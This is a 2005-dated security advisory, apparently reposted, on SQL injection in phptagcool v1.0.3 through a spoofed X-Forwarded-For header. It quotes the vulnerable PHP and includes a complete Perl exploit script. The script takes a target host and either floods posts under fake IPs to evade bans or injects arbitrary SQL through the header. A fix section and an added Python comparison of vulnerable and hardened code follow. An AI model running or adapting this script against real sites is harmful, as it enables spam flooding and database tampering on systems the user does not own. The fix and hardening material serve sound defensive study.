Php Tag Cool Sql Injection

  • October 2019
#####################################################################
advisory #2 "phptagcool sql injection"
$ author: megabyte
$ contact: [email protected] [email protected] [email protected]
$ date: aug 24 2005
$ website: http://mbytesecurity.org
$ risk: high
$ vendor url: http://crashcool.com
$ affected software: phptagcool v1.0.3
$ greetz: pandora, I love you baby; rootbox for discovering the forwarded-for issue
#####################################################################

-= description =-

phptagcool is an online tag system for leaving your comments.

---------------------------------------------------------------------------

-= vulnerabilities =-

| "sql injection" |

phptagcool lets an attacker inject SQL by spoofing the X-Forwarded-For header. post.php takes the client address from X-Forwarded-For (or Via) whenever one of them is present, and any HTTP client can set those headers to an arbitrary string; the value is then interpolated, unescaped, into the query that checks whether the poster is banned. Here is the vulnerable portion of the code in post.php:

___________________________________________________________________________
# get the client ip
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_VIA'])) {
    $ip = $_SERVER['HTTP_VIA'];
} elseif (isset($_SERVER['REMOTE_ADDR'])) {
    $ip = $_SERVER['REMOTE_ADDR'];
} else {
    $ip = "x.x.x.x";
}

# check whether the user is banned
# connect to the db
$conexion = mysql_connect($host, $usuario, $contrasenya);
# select the db
mysql_select_db($base, $conexion);
# $ip goes straight into the query without escaping
$consulta2 = mysql_query("select * from $t_ban where ip='$ip'", $conexion);
____________________________________________________________________________

So if we send X-Forwarded-For with a value of our own choosing instead of an IP address, that value ends up inside the SQL:

$consulta2 = mysql_query("select * from $t_ban where ip='here i can inject'", $conexion);

| exploit |

You can use any man-in-the-middle tool that intercepts and edits HTTP headers, such as Achilles. The script below does it directly and supports two kinds of attack: flooding (a fresh fake address on every post, so the ban table never matches) and SQL injection through the spoofed header. Prompts and messages were translated from Spanish; both attacks send the same POST, differing only in the X-Forwarded-For value.

___________________________________________________________________________
#!/usr/bin/perl
## phptagcool zatueritor 1.0
## copyright: megabyte www.mbytesecurity.org
## greetz: rootbox for discovering the forwarded-for issue
## I love you pandora
## crashcool, you got defaced by a bug in your own code; what will you come up with now?
use strict;
use warnings;
use IO::Socket;

print q(
phptagcool zatueritor 1.0 by megabyte
);
print q(host |without http://www.| );
my $host = <STDIN>; chomp $host;
print q(path |e.g. /phptagcool/ or /| );
my $pth = <STDIN>; chomp $pth;
print q(attack type |1 = mass posting, 2 = sql injection| );
my $type = <STDIN>; chomp $type;

## form fields of one tag post; post.php runs the ban check before storing it
my $postit = "nick=megabyte&url=http%3a%2f%2fwww.mbytesecurity.org&mensaje=floodinglametag&submit=enviar";

## send one POST to mensajes.php carrying the given X-Forwarded-For value
sub send_post {
    my ($xff) = @_;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => 80,
        Proto    => "tcp",
    ) or die "\ncould not connect :( $!\n";
    my $lrg = length $postit;
    print $sock "POST ${pth}mensajes.php HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
    print $sock "Referer: $host\r\n";
    print $sock "Accept-Language: en-us\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n";
    ## the spoofed header: post.php copies it straight into $ip
    print $sock "X-Forwarded-For: $xff\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    print $sock "Content-Length: $lrg\r\n\r\n";
    print $sock $postit;
    close $sock;
}

if ($type == 1) {
    ## the flood attack: we generate our own ip address so we won't be banned :)
    for my $x (0 .. 254) {
        send_post("127.0.0.$x");
        syswrite STDOUT, ".";
    }
} elsif ($type == 2) {
    ## the sql injection attack :)
    print q(injection to execute, e.g. |myip,some sql here| );
    my $sql = <STDIN>; chomp $sql;
    send_post($sql);
} else {
    die "there are only 2 options, idiot\n";
}
____________________________________________________________________________

-------------------------------------------------------------

-= how to fix =-

Filter HTTP_X_FORWARDED_FOR (and HTTP_VIA). Neither header says anything trustworthy about the client unless a proxy you control set it, so use REMOTE_ADDR for the ban check, accept a forwarded address only when the request comes from your own proxy, verify that the value really is an IP address, and escape it before it goes into the query.

-= contact =-

megabyte
http://mbytesecurity.org
the god of the net
greetings to pandora my baby
zeus, cairo, redpoint, x0p0x and all lame band
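The following is an added example, not part of the advisory and not phptagcool's code: it re-implements the client-address selection and ban check from post.php in Python over an in-memory SQLite table, next to a hardened version that applies the fix described above (trust X-Forwarded-For only from a configured proxy, validate the address, parameterize the query). The table name `ban`, the banned address 10.0.0.5, the proxy address 192.0.2.10 and the request environments are all constructed for the demonstration.

```python
"""Client-IP handling as in phptagcool's post.php, vulnerable and hardened.

Added illustration (not phptagcool's code). The PHP logic from the advisory is
mirrored in Python over SQLite so both versions can be executed side by side.
Table/column names, the banned address and the requests are constructed.
"""
import ipaddress
import sqlite3


def make_db():
    """Constructed stand-in for phptagcool's $t_ban table with one banned address."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ban (ip TEXT)")
    conn.execute("INSERT INTO ban VALUES ('10.0.0.5')")
    return conn


# --- vulnerable: same precedence and same string interpolation as post.php ---

def client_ip_vulnerable(env):
    """Any client can set X-Forwarded-For or Via; REMOTE_ADDR is only a fallback."""
    if "HTTP_X_FORWARDED_FOR" in env:
        return env["HTTP_X_FORWARDED_FOR"]
    if "HTTP_VIA" in env:
        return env["HTTP_VIA"]
    return env.get("REMOTE_ADDR", "x.x.x.x")


def ban_query_vulnerable(ip):
    """Builds "select * from $t_ban where ip='$ip'" by interpolation."""
    return f"SELECT * FROM ban WHERE ip='{ip}'"


def is_banned_vulnerable(conn, env):
    ip = client_ip_vulnerable(env)
    return len(conn.execute(ban_query_vulnerable(ip)).fetchall()) > 0


# --- hardened: trusted proxies only, validated address, bound parameter --------

def client_ip_hardened(env, trusted_proxies=frozenset()):
    """Use the TCP peer unless it is one of our own proxies; in that case take
    the last X-Forwarded-For entry (the one that proxy appended) and require
    it to parse as an IP address. Raises ValueError on anything else."""
    peer = env.get("REMOTE_ADDR")
    if peer is None:
        raise ValueError("no peer address")
    candidate = peer
    if peer in trusted_proxies and "HTTP_X_FORWARDED_FOR" in env:
        candidate = env["HTTP_X_FORWARDED_FOR"].split(",")[-1].strip()
    return str(ipaddress.ip_address(candidate))


def is_banned_hardened(conn, env, trusted_proxies=frozenset()):
    ip = client_ip_hardened(env, trusted_proxies)
    return len(conn.execute("SELECT * FROM ban WHERE ip = ?", (ip,)).fetchall()) > 0


def hardened_rejects(env, trusted_proxies=frozenset()):
    """True when the hardened path refuses the request instead of guessing."""
    try:
        client_ip_hardened(env, trusted_proxies)
        return False
    except ValueError:
        return True


def demo():
    """Constructed requests from the banned host 10.0.0.5, plus one via a proxy."""
    conn = make_db()
    honest = {"REMOTE_ADDR": "10.0.0.5"}
    spoofed = {"REMOTE_ADDR": "10.0.0.5",
               "HTTP_X_FORWARDED_FOR": "1.2.3.4' AND '1'='0"}
    flood = {"REMOTE_ADDR": "10.0.0.5", "HTTP_X_FORWARDED_FOR": "127.0.0.7"}
    via_proxy = {"REMOTE_ADDR": "192.0.2.10",
                 "HTTP_X_FORWARDED_FOR": "10.0.0.5"}
    trusted = {"192.0.2.10"}
    return {
        "injected_query": ban_query_vulnerable(spoofed["HTTP_X_FORWARDED_FOR"]),
        "vuln_honest": is_banned_vulnerable(conn, honest),     # True
        "vuln_spoofed": is_banned_vulnerable(conn, spoofed),   # False: bypassed
        "vuln_flood": is_banned_vulnerable(conn, flood),       # False: bypassed
        "hard_honest": is_banned_hardened(conn, honest),       # True
        "hard_spoofed": is_banned_hardened(conn, spoofed),     # True: header ignored
        "hard_flood": is_banned_hardened(conn, flood),         # True: header ignored
        "hard_via_proxy": is_banned_hardened(conn, via_proxy, trusted),  # True
        "hard_rejects_junk": hardened_rejects(
            {"REMOTE_ADDR": "192.0.2.10",
             "HTTP_X_FORWARDED_FOR": "1.2.3.4' OR '1'='1"}, trusted),   # True
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The spoofed request turns the ban check into `SELECT * FROM ban WHERE ip='1.2.3.4' AND '1'='0'`, which matches nothing, so the banned host posts anyway; the hardened version never reads the header unless the peer is a listed proxy, and even then an address that does not parse is rejected before it reaches the query, and the query itself binds `ip` as a parameter so no value can change its shape.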
